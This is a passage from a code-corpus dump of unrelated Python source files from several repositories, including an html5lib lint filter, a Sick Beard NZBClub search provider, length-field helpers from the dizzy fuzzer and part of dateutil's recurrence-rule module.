'__str__' in dct: dct['__unicode__'] = dct['__str__'] dct['__str__'] = lambda self: self.__unicode__().encode('utf-8') return type.__new__(cls, name, bases, dct) if sys.version_info[1] <= 6: def __instancecheck__(cls, instance): if cls.__name__ == "object": return isinstance(instance, native_object) subclass = getattr(instance, '__class__', None) subtype = type(instance) instance_type = getattr(abc, '_InstanceType', None) if not instance_type: class test_object: pass instance_type = type(test_object) if subtype is instance_type: subtype = subclass if subtype is subclass or subclass is None: return cls.__subclasscheck__(subtype) return (cls.__subclasscheck__(subclass) or cls.__subclasscheck__(subtype)) else: def __instancecheck__(cls, instance): if cls.__name__ == "object": return isinstance(instance, native_object) return type.__instancecheck__(cls, instance) class object(with_metaclass(FixStr, object)): pass __all__ = common + ['round', 'dict', 'apply', 'cmp', 'coerce', 'execfile', 'raw_input', 'unpacks', 'str', 'chr', 'input', 'range', 'filter', 'map', 'zip', 'object']
impowski/servo
refs/heads/master
tests/wpt/css-tests/tools/html5lib/html5lib/filters/lint.py
979
from __future__ import absolute_import, division, unicode_literals from gettext import gettext _ = gettext from . import _base from ..constants import cdataElements, rcdataElements, voidElements from ..constants import spaceCharacters spaceCharacters = "".join(spaceCharacters) class LintError(Exception): pass class Filter(_base.Filter): def __iter__(self): open_elements = [] contentModelFlag = "PCDATA" for token in _base.Filter.__iter__(self): type = token["type"] if type in ("StartTag", "EmptyTag"): name = token["name"] if contentModelFlag != "PCDATA": raise LintError(_("StartTag not in PCDATA content model flag: %(tag)s") % {"tag": name}) if not isinstance(name, str): raise LintError(_("Tag name is not a string: %(tag)r") % {"tag": name}) if not name: raise LintError(_("Empty tag name")) if type == "StartTag" and name in voidElements: raise LintError(_("Void element reported as StartTag token: %(tag)s") % {"tag": name}) elif type == "EmptyTag" and name not in voidElements: raise LintError(_("Non-void element reported as EmptyTag token: %(tag)s") % {"tag": token["name"]}) if type == "StartTag": open_elements.append(name) for name, value in token["data"]: if not isinstance(name, str): raise LintError(_("Attribute name is not a string: %(name)r") % {"name": name}) if not name: raise LintError(_("Empty attribute name")) if not isinstance(value, str): raise LintError(_("Attribute value is not a string: %(value)r") % {"value": value}) if name in cdataElements: contentModelFlag = "CDATA" elif name in rcdataElements: contentModelFlag = "RCDATA" elif name == "plaintext": contentModelFlag = "PLAINTEXT" elif type == "EndTag": name = token["name"] if not isinstance(name, str): raise LintError(_("Tag name is not a string: %(tag)r") % {"tag": name}) if not name: raise LintError(_("Empty tag name")) if name in voidElements: raise LintError(_("Void element reported as EndTag token: %(tag)s") % {"tag": name}) start_name = open_elements.pop() if start_name != name: raise LintError(_("EndTag (%(end)s) does not match StartTag (%(start)s)") % {"end": name, "start": start_name}) contentModelFlag = "PCDATA" elif type == "Comment": if contentModelFlag != "PCDATA": raise LintError(_("Comment not in PCDATA content model flag")) elif type in ("Characters", "SpaceCharacters"): data = token["data"] if not isinstance(data, str): raise LintError(_("Attribute name is not a string: %(name)r") % {"name": data}) if not data: raise LintError(_("%(type)s token with empty data") % {"type": type}) if type == "SpaceCharacters": data = data.strip(spaceCharacters) if data: raise LintError(_("Non-space character(s) found in SpaceCharacters token: %(token)r") % {"token": data}) elif type == "Doctype": name = token["name"] if contentModelFlag != "PCDATA": raise LintError(_("Doctype not in PCDATA content model flag: %(name)s") % {"name": name}) if not isinstance(name, str): raise LintError(_("Tag name is not a string: %(tag)r") % {"tag": name}) # XXX: what to do with token["data"] ? elif type in ("ParseError", "SerializeError"): pass else: raise LintError(_("Unknown token type: %(type)s") % {"type": type}) yield token
mbauskar/Das_frappe
refs/heads/develop
frappe/core/doctype/userrole/__init__.py
1829
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals
XeryusTC/rotd
refs/heads/master
recipes/migrations/0007_auto_20150904_1819.py
1
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('recipes', '0006_ingredient'), ] operations = [ migrations.AlterField( model_name='ingredient', name='used_in', field=models.ManyToManyField(to='recipes.Recipe', blank=True), ), ]
chandlercr/aima-python
refs/heads/master
submissions/Kinley/drugs.py
15
''' Hello student. Thank you for downloading a CORGIS library. However, you do not need to open this library. Instead you should use the following: import drugs If you opened the file because you are curious how this library works, then well done! We hope that you find it a useful learning experience. However, you should know that this code is meant to solve somewhat esoteric pedagogical problems, so it is often not best practices. ''' import sys as _sys import os as _os import json as _json import sqlite3 as _sql import difflib as _difflib class _Constants(object): ''' Global singleton object to hide some of the constants; some IDEs reveal internal module details very aggressively, and there's no other way to hide stuff. ''' _HEADER = {'User-Agent': 'CORGIS Drugs library for educational purposes'} _PYTHON_3 = _sys.version_info >= (3, 0) _TEST = False _HARDWARE = 100 if _Constants._PYTHON_3: import urllib.request as _request from urllib.parse import quote_plus as _quote_plus from urllib.error import HTTPError as _HTTPError else: import urllib2 as _urllib2 from urllib import quote_plus as _quote_plus from urllib2 import HTTPError as _HTTPError class DatasetException(Exception): ''' Thrown when there is an error loading the dataset for some reason.''' pass _Constants._DATABASE_NAME = "drugs.db" if not _os.access(_Constants._DATABASE_NAME, _os.F_OK): raise DatasetException("Error! Could not find a \"{0}\" file. Make sure that there is a \"{0}\" in the same directory as \"{1}.py\"! Spelling is very important here.".format(_Constants._DATABASE_NAME, __name__)) elif not _os.access(_Constants._DATABASE_NAME, _os.R_OK): raise DatasetException("Error! Could not read the \"{0}\" file. Make sure that it readable by changing its permissions. You may need to get help from your instructor.".format(_Constants._DATABASE_NAME, __name__)) elif not _os.access(_Constants._DATABASE_NAME, _os.W_OK): _sys.stderr.write('The local cache (\" \") will not be updated. Make sure that it is writable by changing its permissions. You may need to get help from your instructor.\n'.format(_Constants._DATABASE_NAME)) _sys.stderr.flush() _Constants._DATABASE = _sql.connect(_Constants._DATABASE_NAME) class _Auxiliary(object): @staticmethod def _parse_type(value, type_func): """ Attempt to cast *value* into *type_func*, returning *default* if it fails. """ default = type_func(0) if value is None: return default try: return type_func(value) except ValueError: return default @staticmethod def _byteify(input): """ Force the given input to only use `str` instead of `bytes` or `unicode`. This works even if the input is a dict, list, """ if isinstance(input, dict): return {_Auxiliary._byteify(key): _Auxiliary._byteify(value) for key, value in input.items()} elif isinstance(input, list): return [_Auxiliary._byteify(element) for element in input] elif _Constants._PYTHON_3 and isinstance(input, str): return str(input.encode('ascii', 'replace').decode('ascii')) elif not _Constants._PYTHON_3 and isinstance(input, unicode): return str(input.encode('ascii', 'replace').decode('ascii')) else: return input @staticmethod def _guess_schema(input): if isinstance(input, dict): return {str(key.encode('ascii', 'replace').decode('ascii')): _Auxiliary._guess_schema(value) for key, value in input.items()} elif isinstance(input, list): return [_Auxiliary._guess_schema(input[0])] if input else [] else: return type(input) ################################################################################ # Domain Objects ################################################################################ ################################################################################ # Interfaces ################################################################################ def get_surveys(question): """ Given one of the survey questions, returns the associated data from respondents. :param question: The name of the survey question. Must be one of 'Cocaine Year', 'Alcohol Month', 'Cigarette Use', 'Alcohol Risk', 'Illicit/Alcohol Dependence or Abuse', 'Marijuana New', 'Illicit Dependence', 'Alcohol Dependence', 'Tobacco Use', 'Alcohol Binge', 'Marijuana Risk', 'Alcohol Abuse', 'Marijuana Month', 'Illicit Dependence or Abuse', 'Smoking Risk', 'Illicit Month', 'Alcohol Treatment', 'Nonmarijuana Illicit', 'Pain Relievers', 'Marijuana Year', 'Illicit Treatment', 'Depression'. :type question: str """ # Match it against recommend values potentials = [r[0].lower() for r in _Constants._DATABASE.execute("SELECT DISTINCT name FROM drugs").fetchall()] if question.lower() not in potentials: best_guesses = _difflib.get_close_matches(question, potentials) if best_guesses: raise DatasetException("Error, the given identifier could not be found. Perhaps you meant one of:\n\t{}".format('\n\t'.join(map('"{}"'.format, best_guesses)))) else: raise DatasetException("Error, the given identifier could not be found. Please check to make sure you have the right spelling.") if False: # If there was a Test version of this method, it would go here. But alas. pass else: rows = _Constants._DATABASE.execute("SELECT data FROM drugs WHERE name=? COLLATE NOCASE".format( hardware=_Constants._HARDWARE), (question, )) data = [r[0] for r in rows] data = [_Auxiliary._byteify(_json.loads(r)) for r in data] return _Auxiliary._byteify(data) ################################################################################ # Internalized testing code ################################################################################ def _test_interfaces(): from pprint import pprint as _pprint from timeit import default_timer as _default_timer # Production test print("Production get_surveys") start_time = _default_timer() result = get_surveys("'Cigarette Use'") print("{} entries found.".format(len(result))) _pprint(_Auxiliary._guess_schema(result)) print("Time taken: {}".format(_default_timer() - start_time)) if __name__ == '__main__': from optparse import OptionParser as _OptionParser _parser = _OptionParser() _parser.add_option("-t", "--test", action="store_true", default=False, help="Execute the interfaces to test them.") _parser.add_option("-r", "--reset", action="store_true", default=False, help="Reset the cache") (_options, _args) = _parser.parse_args() if _options.test: _test_interfaces() if _options.reset: _modify_self()
prvnkumar/powerline
refs/heads/develop
powerline/renderers/shell/zsh.py
38
# vim:fileencoding=utf-8:noet from __future__ import (unicode_literals, division, absolute_import, print_function) from powerline.renderers.shell import ShellRenderer class ZshPromptRenderer(ShellRenderer): '''Powerline zsh prompt segment renderer.''' escape_hl_start = '%{' escape_hl_end = '%}' character_translations = ShellRenderer.character_translations.copy() character_translations[ord('%')] = '%%' renderer = ZshPromptRenderer
mattesno1/Sick-Beard
refs/heads/master
sickbeard/providers/nzbclub.py
2
#!/usr/bin/env python # -*- coding: utf-8 -*- # Author: Nic Wolfe <nic@wolfeden.ca> # URL: http://code.google.com/p/sickbeard/ # # This file is part of Sick Beard. # # Sick Beard is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Sick Beard is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Sick Beard. If not, see <http://www.gnu.org/licenses/>. import re import time import urllib import datetime import traceback NZBCLUB_RSS_URL = "http://www.nzbclub.com/nzbrss.aspx" try: import xml.etree.cElementTree as etree except ImportError: import elementtree.ElementTree as etree import sickbeard import generic from sickbeard import classes, logger, show_name_helpers, helpers from sickbeard import tvcache from sickbeard.exceptions import ex from lib.dateutil.parser import parse as parseDate class NZBClubProvider(generic.NZBProvider): def __init__(self): generic.NZBProvider.__init__(self, "NZBClub") self.supportsBacklog = True self.cache = NZBClubCache(self) self.url = 'http://nzbclub.com/' self.searchString = '' def isEnabled(self): return sickbeard.NZBCLUB def _get_season_search_strings(self, show, season): # sceneSearchStrings = set(show_name_helpers.makeSceneSeasonSearchString(show, season, "NZBIndex")) # # search for all show names and episode numbers like ("a","b","c") in a single search # return [' '.join(sceneSearchStrings)] return [x for x in show_name_helpers.makeSceneSeasonSearchString(show, season)] def _get_episode_search_strings(self, ep_obj): # # tvrname is better for most shows # if ep_obj.show.tvrname: # searchStr = ep_obj.show.tvrname + " S%02dE%02d"%(ep_obj.season, ep_obj.episode) # else: # searchStr = ep_obj.show.name + " S%02dE%02d"%(ep_obj.season, ep_obj.episode) # return [searchStr] return [x for x in show_name_helpers.makeSceneSearchString(ep_obj)] def _get_title_and_url(self, item): (title, url) = super(NZBClubProvider, self)._get_title_and_url(item) url = url.replace("/nzb_view/","/nzb_get/") + ".nzb" logger.log( '_get_title_and_url(%s), returns (%s, %s)' %(item, title, url), logger.DEBUG) logger.log( 'self.searchString=%s' %(self.searchString), logger.DEBUG) # try to filter relevant parts from title stitle = filter( lambda x: x.lower().startswith( self.searchString.lower().strip().split()[0] ), re.sub( '\s+', ' ', re.sub('[\[\]\(\)\<\>]+', ' ', title) ).strip().split() ) if len(stitle) > 1: logger.log( 'more than one result for the fixed title (%s), using first.' % stitle, logger.ERROR ) if stitle: title = stitle[0] logger.log( 'fixed title: "%s"' % title, logger.DEBUG) return (title, url) def _doSearch(self, curString, quotes=False, show=None): term = re.sub('[\.\-\:]', ' ', curString).encode('utf-8') self.searchString = term if quotes: term = "\""+term+"\"" params = {"q": term, "rpp": 50, #max 50 "ns": 1, #nospam "szs":16, #min 100MB "sp":1 #nopass } searchURL = NZBCLUB_RSS_URL + "?" + urllib.urlencode(params) logger.log(u"Search string: " + searchURL) logger.log(u"Sleeping 10 seconds to respect NZBClub's rules") time.sleep(10) searchResult = self.getURL(searchURL,[("User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0) Gecko/20100101 Firefox/5.0"),("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"),("Accept-Language","de-de,de;q=0.8,en-us;q=0.5,en;q=0.3"),("Accept-Charset","ISO-8859-1,utf-8;q=0.7,*;q=0.7"),("Connection","keep-alive"),("Cache-Control","max-age=0")]) if not searchResult: return [] try: parsedXML = etree.fromstring(searchResult) items = parsedXML.iter('item') except Exception, e: logger.log(u"Error trying to load NZBClub RSS feed: "+ex(e), logger.ERROR) return [] results = [] for curItem in items: (title, url) = self._get_title_and_url(curItem) if not title or not url: logger.log(u"The XML returned from the NZBClub RSS feed is incomplete, this result is unusable", logger.ERROR) continue if not title == 'Not_Valid': results.append(curItem) return results def findPropers(self, date=None): results = [] for curResult in self._doSearch("(PROPER,REPACK)"): (title, url) = self._get_title_and_url(curResult) pubDate_node = curResult.find('pubDate') pubDate = helpers.get_xml_text(pubDate_node) dateStr = re.search('(\w{3}, \d{1,2} \w{3} \d{4} \d\d:\d\d:\d\d) [\+\-]\d{4}', pubDate) if not dateStr: logger.log(u"Unable to figure out the date for entry "+title+", skipping it") continue else: resultDate = parseDate(dateStr.group(1)).replace(tzinfo=None) if date == None or resultDate > date: results.append(classes.Proper(title, url, resultDate)) return results class NZBClubCache(tvcache.TVCache): def __init__(self, provider): tvcache.TVCache.__init__(self, provider) # only poll NZBIndex every 25 minutes max self.minTime = 25 def _getRSSData(self): # get all records since the last timestamp url = "%s?" % NZBCLUB_RSS_URL urlArgs = {'q': '', "rpp": 50, #max 50 "ns": 1, #nospam "szs":16, #min 100MB "sp":1 #nopass } url += urllib.urlencode(urlArgs) logger.log(u"NZBClub cache update URL: "+ url, logger.DEBUG) data = self.provider.getURL(url) return data provider = NZBClubProvider()
kalahbrown/HueBigSQL
refs/heads/master
desktop/core/ext-py/cx_Oracle-5.1.2/test/TestEnv.py
34
"""Define test environment.""" import cx_Oracle import os import sys import unittest def GetValue(name, label): value = os.environ.get("CX_ORACLE_" + name) if value is None: value = raw_input(label + ": ") if hasattr(cx_Oracle, "UNICODE") or sys.version_info[0] >= 3: return value return unicode(value) USERNAME = GetValue("USERNAME", "user name") PASSWORD = GetValue("PASSWORD", "password") TNSENTRY = GetValue("TNSENTRY", "TNS entry") ARRAY_SIZE = int(GetValue("ARRAY_SIZE", "array size"))
ernw/dizzy
refs/heads/master
dizzy/functions/length.py
1
# length.py # # Copyright 2017 Daniel Mende <mail@c0decafe.de> # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from dizzy.config import CONFIG from dizzy.value import Value from dizzy.tools import pack_with_length from dizzy.objects import START, END from dizzy.log import print_dizzy, DEBUG from . import BOTH def length(target, start=START, stop=END, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = dizzy_iterator[target].size value = Value(pack_with_length(dizzy_iterator[start:stop].size, size, endian), size) print_dizzy("length/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length/%s: is not updated." % (target,), DEBUG) return (func, when) def length_bytes(target, start=START, stop=END, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = dizzy_iterator[target].size value = Value(pack_with_length((dizzy_iterator[start:stop].size + 7) // 8, size, endian), size) print_dizzy("length_bytes/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_bytes/%s: is not updated." % (target,), DEBUG) return (func, when) def length_string_bytes(target, start=START, stop=END, encoding=CONFIG["GLOBALS"]["CODEC"], when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = str((dizzy_iterator[start:stop].size + 7) // 8) value = Value(bytes(size, encoding), len(size) * 8) print_dizzy("length_string_bytes/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_string_bytes/%s: is not updated." % (target,), DEBUG) return (func, when) def length_lambda(target, start=START, stop=END, lam=lambda x: x, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = dizzy_iterator[target].size value = Value(pack_with_length(lam(dizzy_iterator[start:stop].size), size, endian), size) print_dizzy("length_lambda/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_lambda/%s: is not updated." % (target,), DEBUG) return (func, when) def length_lambda2(target, start=START, stop=END, lam=lambda x: x, lam2=lambda x: x, endian="!", when=BOTH): def func(dizzy_iterator): if target not in dizzy_iterator.current_mutated_objects: size = lam(dizzy_iterator[target].size) value = Value(pack_with_length(lam2(dizzy_iterator[start:stop].size), size, endian), size) print_dizzy("length_lambda2/%s: seting to %s." % (target, value), DEBUG) dizzy_iterator[target] = value else: print_dizzy("length_lambda2/%s: is not updated." % (target,), DEBUG) return (func, when)
Eforcers/inbox-cleaner
refs/heads/master
src/lib/dateutil/rrule.py
254
""" Copyright (c) 2003-2010 Gustavo Niemeyer <gustavo@niemeyer.net> This module offers extensions to the standard python 2.3+ datetime module. """ __author__ = "Gustavo Niemeyer <gustavo@niemeyer.net>" __license__ = "PSF License" import itertools import datetime import calendar import thread import sys __all__ = ["rrule", "rruleset", "rrulestr", "YEARLY", "MONTHLY", "WEEKLY", "DAILY", "HOURLY", "MINUTELY", "SECONDLY", "MO", "TU", "WE", "TH", "FR", "SA", "SU"] # Every mask is 7 days longer to handle cross-year weekly periods. M366MASK = tuple([1]*31+[2]*29+[3]*31+[4]*30+[5]*31+[6]*30+ [7]*31+[8]*31+[9]*30+[10]*31+[11]*30+[12]*31+[1]*7) M365MASK = list(M366MASK) M29, M30, M31 = range(1,30), range(1,31), range(1,32) MDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) MDAY365MASK = list(MDAY366MASK) M29, M30, M31 = range(-29,0), range(-30,0), range(-31,0) NMDAY366MASK = tuple(M31+M29+M31+M30+M31+M30+M31+M31+M30+M31+M30+M31+M31[:7]) NMDAY365MASK = list(NMDAY366MASK) M366RANGE = (0,31,60,91,121,152,182,213,244,274,305,335,366) M365RANGE = (0,31,59,90,120,151,181,212,243,273,304,334,365) WDAYMASK = [0,1,2,3,4,5,6]*55 del M29, M30, M31, M365MASK[59], MDAY365MASK[59], NMDAY365MASK[31] MDAY365MASK = tuple(MDAY365MASK) M365MASK = tuple(M365MASK) (YEARLY, MONTHLY, WEEKLY, DAILY, HOURLY, MINUTELY, SECONDLY) = range(7) # Imported on demand. easter = None parser = None class weekday(object): __slots__ = ["weekday", "n"] def __init__(self, weekday, n=None): if n == 0: raise ValueError, "Can't create weekday with n == 0" self.weekday = weekday self.n = n def __call__(self, n): if n == self.n: return self else: return self.__class__(self.weekday, n) def __eq__(self, other): try: if self.weekday != other.weekday or self.n != other.n: return False except AttributeError: return False return True def __repr__(self): s = ("MO", "TU", "WE", "TH", "FR", "SA", "SU")[self.weekday] if not self.n: return s else: return "%s(%+d)" % (s, self.n) MO, TU, WE, TH, FR, SA, SU = weekdays = tuple([weekday(x) for x in range(7)]) class rrulebase: def __init__(self, cache=False): if cache: self._cache = [] self._cache_lock = thread.allocate_lock() self._cache_gen = self._iter() self._cache_complete = False else: self._cache = None self._cache_complete = False self._len = None def __iter__(self): if self._cache_complete: return iter(self._cache) elif self._cache is None: return self._iter() else: return self._iter_cached() def _iter_cached(self): i = 0 gen = self._cache_gen cache = self._cache acquire = self._cache_lock.acquire release = self._cache_lock.release while gen: if i == len(cache): acquire() if self._cache_complete: break try: for j in range(10): cache.append(gen.next()) except StopIteration: self._cache_gen = gen = None self._cache_complete = True break release() yield cache[i] i += 1 while i < self._len: yield cache[i] i += 1 def __getitem__(self, item): if self._cache_complete: return self._cache[item] elif isinstance(item, slice): if item.step and item.step < 0: return list(iter(self))[item] else: return list(itertools.islice(self, item.start or 0, item.stop or sys.maxint, item.step or 1)) elif item >= 0: gen = iter(self) try: for i in range(item+1): res = gen.next() except StopIteration: raise IndexError return res else: return list(iter(self))[item] def __contains__(self, item): if self._cache_complete: return item in self._cache else: for i in self: if i == item: return True elif i > item: return False return False # __len__() introduces a large performance penality. def count(self): if self._len is None: for x in self: pass return self._len def before(self, dt, inc=False): if self._cache_complete: gen = self._cache else: gen = self last = None if inc: for i in gen: if i > dt: break last = i else: for i in gen: if i >= dt: break last = i return last def after(self, dt, inc=False): if self._cache_complete: gen = self._cache else: gen = self if inc: for i in gen: if i >= dt: return i else: for i in gen: if i > dt: return i return None def between(self, after, before, inc=False): if self._cache_complete: gen = self._cache else: gen = self started = False l = [] if inc: for i in gen: if i > before: break elif not started: if i >= after: started = True l.append(i) else: l.append(i) else: for i in gen: if i >= before: break elif not started: if i > after: started = True l.append(i) else: l.append(i) return l class rrule(rrulebase): def __init__(self, freq, dtstart=None, interval=1, wkst=None, count=None, until=None, bysetpos=None, bymonth=None, bymonthday=None, byyearday=None, byeaster=None, byweekno=None, byweekday=None, byhour=None, byminute=None, bysecond=None, cache=False): rrulebase.__init__(self, cache) global easter if not dtstart: dtstart = datetime.datetime.now().replace(microsecond=0) elif not isinstance(dtstart, datetime.datetime): dtstart = datetime.datetime.fromordinal(dtstart.toordinal()) else: dtstart = dtstart.replace(microsecond=0) self._dtstart = dtstart self._tzinfo = dtstart.tzinfo self._freq = freq self._interval = interval self._count = count if until and not isinstance(until, datetime.datetime): until = datetime.datetime.fromordinal(until.toordinal()) self._until = until if wkst is None: self._wkst = calendar.firstweekday() elif type(wkst) is int: self._wkst = wkst else: self._wkst = wkst.weekday if bysetpos is None: self._bysetpos = None elif type(bysetpos) is int: if bysetpos == 0 or not (-366 <= bysetpos <= 366): raise ValueError("bysetpos must be between 1 and 366, " "or between -366 and -1") self._bysetpos = (bysetpos,) else: self._bysetpos = tuple(bysetpos) for pos in self._bysetpos: if pos == 0 or not (-366 <= pos <= 366): raise ValueError("bysetpos must be between 1 and 366, " "or between -366 and -1") if not (byweekno or byyearday or bymonthday or byweekday is not None or byeaster is not None): if freq == YEARLY: if not bymonth: bymonth = dtstart.month bymonthday = dtstart.day elif freq == MONTHLY: bymonthday = dtstart.day elif freq == WEEKLY: byweekday = dtstart.weekday() # bymonth if not bymonth: self._bymonth = None elif type(bymonth) is int: self._bymonth = (bymonth,) else: self._bymonth = tuple(bymonth) # byyearday if not byyearday: self._byyearday = None elif type(byyearday) is int: self._byyearday = (byyearday,) else: self._byyearday = tuple(byyearday) # byeaster if byeaster is not None: if not easter: from dateutil import easter if type(byeaster) is int: self._byeaster = (byeaster,) else: self._byeaster = tuple(byeaster) else: self._byeaster = None # bymonthay if not bymonthday: self._bymonthday = () self._bynmonthday = () elif type(bymonthday) is int: if bymonthday < 0: self._bynmonthday = (bymonthday,) self._bymonthday = () else: self._bymonthday = (bymonthday,) self._bynmonthday = () else: self._bymonthday = tuple([x for x in bymonthday if x > 0]) self._bynmonthday = tuple([x for x in bymonthday if x < 0]) # byweekno if byweekno is None: self._byweekno = None elif type(byweekno) is int: self._byweekno = (byweekno,) else: self._byweekno = tuple(byweekno) # byweekday / bynweekday if byweekday is None: self._byweekday = None self._bynweekday = None elif type(byweekday) is int: self._byweekday = (byweekday,) self._bynweekday = None elif hasattr(byweekday, "n"): if not byweekday.n or freq > MONTHLY: self._byweekday = (byweekday.weekday,) self._bynweekday = None else: self._bynweekday = ((byweekday.weekday, byweekday.n),) self._byweekday = None else: self._byweekday = [] self._bynweekday = [] for wday in byweekday: if type(wday) is int: self._byweekday.append(wday) elif not wday.n or freq > MONTHLY: self._byweekday.append(wday.weekday) else: self._bynweekday.append((wday.weekday, wday.n)) self._byweekday = tuple(self._byweekday) self._bynweekday = tuple(self._bynweekday) if not self._byweekday: self._byweekday = None elif not self._bynweekday: self._bynweekday = None # byhour if byhour is None: if freq < HOURLY: self._byhour = (dtstart.hour,) else: self._byhour = None elif type(byhour) is int: self._byhour = (byhour,) else: self._byhour = tuple(byhour) # byminute if byminute is None: if freq < MINUTELY: self._byminute = (dtstart.minute,) else: self._byminute = None elif type(byminute) is int: self._byminute = (byminute,) else: self._byminute = tuple(byminute) # bysecond if bysecond is None: if freq < SECONDLY: self._bysecond = (dtstart.second,) else: self._bysecond = None elif type(bysecond) is int: self._bysecond = (bysecond,) else: self._bysecond = tuple(bysecond) if self._freq >= HOURLY: self._timeset = None else: self._timeset = [] for hour in self._byhour: for minute in self._byminute: for second in self._bysecond: self._timeset.append( datetime.time(hour, minute, second, tzinfo=self._tzinfo)) self._timeset.sort() self._timeset = tuple(self._timeset) def _iter(self): year, month, day, hour, minute, second, weekday, yearday, _ = \ self._dtstart.timetuple() # Some local variables to speed things up a bit freq = self._freq interval = self._interval wkst = self._wkst until = self._until bymonth = self._bymonth byweekno = self._byweekno byyearday = self._byyearday byweekday = self._byweekday byeaster = self._byeaster bymonthday = self._bymonthday bynmonthday = self._bynmonthday bysetpos = self._bysetpos byhour = self._byhour byminute = self._byminute bysecond = self._bysecond ii = _iterinfo(self) ii.rebuild(year, month) getdayset = {YEARLY:ii.ydayset, MONTHLY:ii.mdayset, WEEKLY:ii.wdayset, DAILY:ii.ddayset, HOURLY:ii.ddayset, MINUTELY:ii.ddayset, SECONDLY:ii.ddayset}[freq] if freq < HOURLY: timeset = self._timeset else: gettimeset = {HOURLY:ii.htimeset, MINUTELY:ii.mtimeset, SECONDLY:ii.stimeset}[freq] if ((freq >= HOURLY and self._byhour and hour not in self._byhour) or (freq >= MINUTELY and self._byminute and minute not in self._byminute) or (freq >= SECONDLY and self._bysecond and second not in self._bysecond)): timeset = () else: timeset = gettimeset(hour, minute, second) total = 0 count = self._count while True: # Get dayset with the right frequency dayset, start, end = getdayset(year, month, day) # Do the "hard" work ;-) filtered = False for i in dayset[start:end]: if ((bymonth and ii.mmask[i] not in bymonth) or (byweekno and not ii.wnomask[i]) or (byweekday and ii.wdaymask[i] not in byweekday) or (ii.nwdaymask and not ii.nwdaymask[i]) or (byeaster and not ii.eastermask[i]) or ((bymonthday or bynmonthday) and ii.mdaymask[i] not in bymonthday and ii.nmdaymask[i] not in bynmonthday) or (byyearday and ((i < ii.yearlen and i+1 not in byyearday and -ii.yearlen+i not in byyearday) or (i >= ii.yearlen and i+1-ii.yearlen not in byyearday and -ii.nextyearlen+i-ii.yearlen not in byyearday)))): dayset[i] = None filtered = True # Output results if bysetpos and timeset: poslist = [] for pos in bysetpos: if pos < 0: daypos, timepos = divmod(pos, len(timeset)) else: daypos, timepos = divmod(pos-1, len(timeset)) try: i = [x for x in dayset[start:end] if x is not None][daypos] time = timeset[timepos] except IndexError: pass else: date = datetime.date.fromordinal(ii.yearordinal+i) res = datetime.datetime.combine(date, time) if res not in poslist: poslist.append(res) poslist.sort() for res in poslist: if until and res > until: self._len = total return elif res >= self._dtstart: total += 1 yield res if count: count -= 1 if not count: self._len = total return else: for i in dayset[start:end]: if i is not None: date = datetime.date.fromordinal(ii.yearordinal+i) for time in timeset: res = datetime.datetime.combine(date, time) if until and res > until: self._len = total return elif res >= self._dtstart: total += 1 yield res if count: count -= 1 if not count: self._len = total return # Handle frequency and interval fixday = False if freq == YEARLY: year += interval if year > datetime.MAXYEAR: self._len = total return ii.rebuild(year, month) elif freq == MONTHLY: month += interval if month > 12: div, mod = divmod(month, 12) month = mod year += div if month == 0: month = 12 year -= 1 if year > datetime.MAXYEAR: self._len = total return ii.rebuild(year, month) elif freq == WEEKLY: if wkst > weekday: day += -(weekday+1+(6-wkst))+self._interval*7 else: day += -(weekday-wkst)+self._interval*7 weekday = wkst fixday = True elif freq == DAILY: day += interval fixday = True elif freq == HOURLY: if filtered: # Jump to one iteration before next day hour += ((23-hour)//interval)*interval while True: hour += interval div, mod = divmod(hour, 24) if div: hour = mod day += div fixday = True if not byhour or hour in byhour: break timeset = gettimeset(hour, minute, second) elif freq == MINUTELY: if filtered: # Jump to one iteration before next day minute += ((1439-(hour*60+minute))//interval)*interval while True: minute += interval div, mod = divmod(minute, 60) if div: minute = mod hour += div div, mod = divmod(hour, 